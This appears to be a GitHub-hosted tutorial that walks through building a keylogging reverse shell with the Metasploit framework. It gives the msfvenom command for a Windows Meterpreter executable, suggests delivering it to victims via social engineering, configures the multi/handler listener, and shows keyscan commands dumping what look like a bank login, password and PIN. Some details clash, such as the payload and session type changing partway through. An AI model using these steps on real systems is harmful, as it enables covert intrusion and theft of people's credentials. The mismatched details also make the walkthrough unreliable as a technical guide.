-
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathBuilding the keylogger using Metasploit-framework
More file actions
111 lines (72 loc) · 4.74 KB
/
Building the keylogger using Metasploit-framework
File metadata and controls
111 lines (72 loc) · 4.74 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
Building the keylogger using Metasploit-framework
PART 1
1.Log in to kali linux software
2.The aim is to create a payload called Meterpreter using Inbuilt Metasploit-framework (see- https://www.offsec.com/metasploit-unleashed/meterpreter-basics/)
#Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code
#Using Meterpreter to generate an executable called keyshell.exe as illustrated before
Metasploit is handy for generating a reverse shell. The following command generates a reverse TCP shell with the Metasploit framework:
It generate a Windows reverse shell executable that will connect back to us on port 4444.
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.2 LPORT=4444 -f exe -o keyshell.exe
#p - payload (windows/x64/meterpreter/reverse_tcp)
#windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has to offer
#It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone
#LHOST - Listen Address (Threat actor IP address)
#LPORT - Listen port (The default is 444, It is advisable to change to another value)
#f - To outpute the executable file in exe (Window extension)
#o - To outpute the executable file name to keyshell.exe
PART 2
3. As seen above, the execuitebale file (keyshell.exe) has been created, exe need to be transported to victim system/infrastructure
#It can be transported to the victim system via Social engineering or more sophisticated ways
#See previous work or update from seyigate repro! on SET (Social Engineer Toolkits Framework)
PART 3
4. As assume that the hacker had already compromised the victim machine through the payload generated using Metasploit framework as explained above.
#Now, hacker can gain more foothold on the machine, launch additional remote and payloads attacks
#Execute malicious code remotely
#Move laterally through the whole system and network infrastructure.
#Data theft such as admin and elevated account credentials theft, financial loss, reputational damage, and legal penalties
#See more of seyigate cybersecurity projects for more details.
For the purpose of this project, A listener interactive shell will be initiated, this will allows for serving a shell to access
the targeted machine when the victim sends a TCP connection to record and steal consecutive keystrokes that the user enters on a device.
#Creating an interactive listener shell
┌──(kali㉿kali)-[~]
└─$ msfconsole
In msfconsole, select an exploit module, which is exploit/multi/handler
multi/handler exploit is a stub that handles exploits launched outside of the framework.
it is also a remote exploit module, which can also engage multiple hosts.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >show info
When using the exploit/multi/handler module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > show options
Then configure the parameter appropriately
msf6 exploit(multi/handler) > set LHOST 192.168.50.2
LHOST => 192.168.50.2
msf6 exploit(multi/handler) > SET LPORT 4444
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
Now that we have everything set up and ready to go,
We run exploit for the multi/handler and execute our generated executable on the victim.
The multi/handler handles the exploit for us and presents us our shell.
msf6 exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler on 192.168.50.2:4444
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (192.168.50.2:31337 -> 192.168.50.34:1150) at 2024-06-14 23:28:25 -0400
meterpreter> keyscan_start
#The keyscan_start command starts the keylogging feature on the remote machine.
Starting the keystroke sniffer ...
meterpreter> keyscan_dump
#The keyscan_dump command is a keylogger feature. You must use the keyscan_start command before using keyscan_dump
Dumping capture keystrokes ...
<SHIFT> www.baclaysbank.co.uk
<SHIFT>yinkajah@gmail.com
<CR> R2jshb!@(*&^HB
<CR>pin: 126782
snip....
Microsoft Windows 10 [Version 10.1.7600]
(C) Copyright 1985-2024 Microsoft Corp.
C:\Documents and Settings\Victim\My Documents> #victim machine.